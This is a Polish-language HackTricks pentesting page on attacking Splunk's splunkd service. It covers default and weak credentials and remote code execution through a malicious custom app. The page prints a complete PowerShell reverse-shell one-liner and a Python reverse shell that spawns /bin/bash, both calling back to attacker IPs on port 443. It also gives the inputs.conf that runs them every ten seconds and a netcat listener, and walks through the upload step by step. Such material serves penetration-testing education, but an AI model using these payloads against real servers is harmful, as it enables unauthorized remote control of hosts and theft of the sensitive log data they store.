8089 - Pentesting Splunkd

Zacznij od zera i stań się ekspertem od hakowania AWS dzięki htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Podstawowe informacje

Splunk to narzędzie do analizy logów, które odgrywa kluczową rolę w zbieraniu, analizowaniu i wizualizacji danych. Chociaż jego początkowym celem nie było pełnienie roli narzędzia SIEM (Security Information and Event Management), zyskał popularność w dziedzinie monitorowania bezpieczeństwa i analizy biznesowej.

Instalacje Splunk są często wykorzystywane do przechowywania danych poufnych i mogą stanowić cenne źródło informacji dla potencjalnych atakujących, jeśli uda im się skompromitować system. Domyślny port: 8089

PORT     STATE SERVICE VERSION
8089/tcp open  http    Splunkd httpd

Serwer sieciowy Splunk działa domyślnie na porcie 8000.

Wyliczanie

Wersja darmowa

Wersja próbna Splunk Enterprise przekształca się w wersję darmową po 60 dniach, która nie wymaga uwierzytelniania. Nie jest rzadkością, że administratorzy systemów instalują wersję próbną Splunka, aby ją przetestować, a następnie o niej zapominają. Automatycznie przekształca się ona w wersję darmową, która nie posiada żadnej formy uwierzytelniania, wprowadzając lukę w zabezpieczeniach środowiska. Niektóre organizacje mogą wybrać wersję darmową ze względu na ograniczenia budżetowe, nie do końca rozumiejąc implikacje braku zarządzania użytkownikami/rolami.

Domyślne dane uwierzytelniające

W starszych wersjach Splunka domyślne dane uwierzytelniające to admin:changeme, które wygodnie są wyświetlane na stronie logowania. Jednakże, najnowsza wersja Splunka ustawia dane uwierzytelniające podczas procesu instalacji. Jeśli domyślne dane uwierzytelniające nie działają, warto sprawdzić popularne słabe hasła, takie jak admin, Welcome, Welcome1, Password123, itp.

Pozyskiwanie informacji

Po zalogowaniu się do Splunka, możemy przeglądać dane, uruchamiać raporty, tworzyć wykresy, instalować aplikacje z biblioteki Splunkbase oraz instalować niestandardowe aplikacje. Można również uruchamiać kod: Splunk ma wiele sposobów uruchamiania kodu, takich jak aplikacje Django po stronie serwera, punkty końcowe REST, skryptowane dane wejściowe oraz skrypty alarmowe. Powszechną metodą zdobycia zdalnego wykonania kodu na serwerze Splunka jest użycie skryptowanego wejścia.

Co więcej, ponieważ Splunk może być instalowany na hostach z systemem Windows lub Linux, można tworzyć skryptowane dane wejściowe do uruchamiania skryptów Bash, PowerShell lub Batch.

Shodan

  • Splunk build

RCE

Tworzenie niestandardowej aplikacji

Niestandardowa aplikacja może uruchamiać skrypty Pythona, Batch, Bash lub PowerShell. Zauważ, że Splunk ma zainstalowanego Pythona, więc nawet na systemach Windows będzie można uruchamiać kod pythona.

Możesz skorzystać z tego pakietu Splunka, aby nam pomóc. Katalog bin w tym repozytorium zawiera przykłady dla Pythona oraz PowerShella. Przejdźmy przez to krok po kroku.

Aby to osiągnąć, najpierw musimy utworzyć niestandardową aplikację Splunka, korzystając z następującej struktury katalogów:

tree splunk_shell/

splunk_shell/
├── bin
└── default

Katalog bin będzie zawierał wszelkie skrypty, które zamierzamy uruchomić (w tym przypadku odwróconą powłokę PowerShell), a domyślny katalog będzie zawierał plik inputs.conf. Nasza odwrócona powłoka będzie jednolinijkowym poleceniem PowerShell:

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close(

Plik inputs.conf mówi Splunkowi który skrypt uruchomić oraz określa inne warunki. Tutaj ustawiamy aplikację jako włączoną i mówimy Splunkowi, aby uruchamiał skrypt co 10 sekund. Interwał zawsze jest podany w sekundach, a wejście (skrypt) zostanie uruchomione tylko wtedy, gdy to ustawienie jest obecne.

cat inputs.conf

[script://./bin/rev.py]
disabled = 0
interval = 10
sourcetype = shell

[script://.\bin\run.bat]
disabled = 0
sourcetype = shell
interval = 10

Potrzebujemy pliku .bat, który zostanie uruchomiony po wdrożeniu aplikacji i wykona polecenie PowerShell.

Następnym krokiem jest wybranie opcji Zainstaluj aplikację z pliku i przesłanie aplikacji.

Przed przesłaniem złośliwej niestandardowej aplikacji, uruchommy nasłuchiwanie za pomocą programu Netcat lub socat.

sudo nc -lnvp 443

listening on [any] 443 ...

Na stronie Prześlij aplikację kliknij przycisk przeglądaj, wybierz archiwum tar, które wcześniej utworzyliśmy, a następnie kliknij Prześlij. Gdy tylko prześlemy aplikację, otrzymamy odwrotną powłokę, a status aplikacji automatycznie zostanie zmieniony na Włączony.

Linux

Jeśli mielibyśmy do czynienia z hostem Linux, musielibyśmy edytować skrypt Pythona rev.py przed utworzeniem archiwum tar i przesłaniem niestandardowej złośliwej aplikacji. Reszta procesu byłaby taka sama, a my uzyskalibyśmy połączenie z odwrotną powłoką na naszym słuchaczu Netcat i moglibyśmy ruszyć do działania.

import sys,socket,os,pty

ip="10.10.14.15"
port="443"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')

RCE & Eskalacja uprawnień

Na następnej stronie znajdziesz wyjaśnienie, jak można nadużyć tego usługi do eskalacji uprawnień i uzyskania trwałości:

pageSplunk LPE and Persistence

Odnośniki

Dowiedz się, jak hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated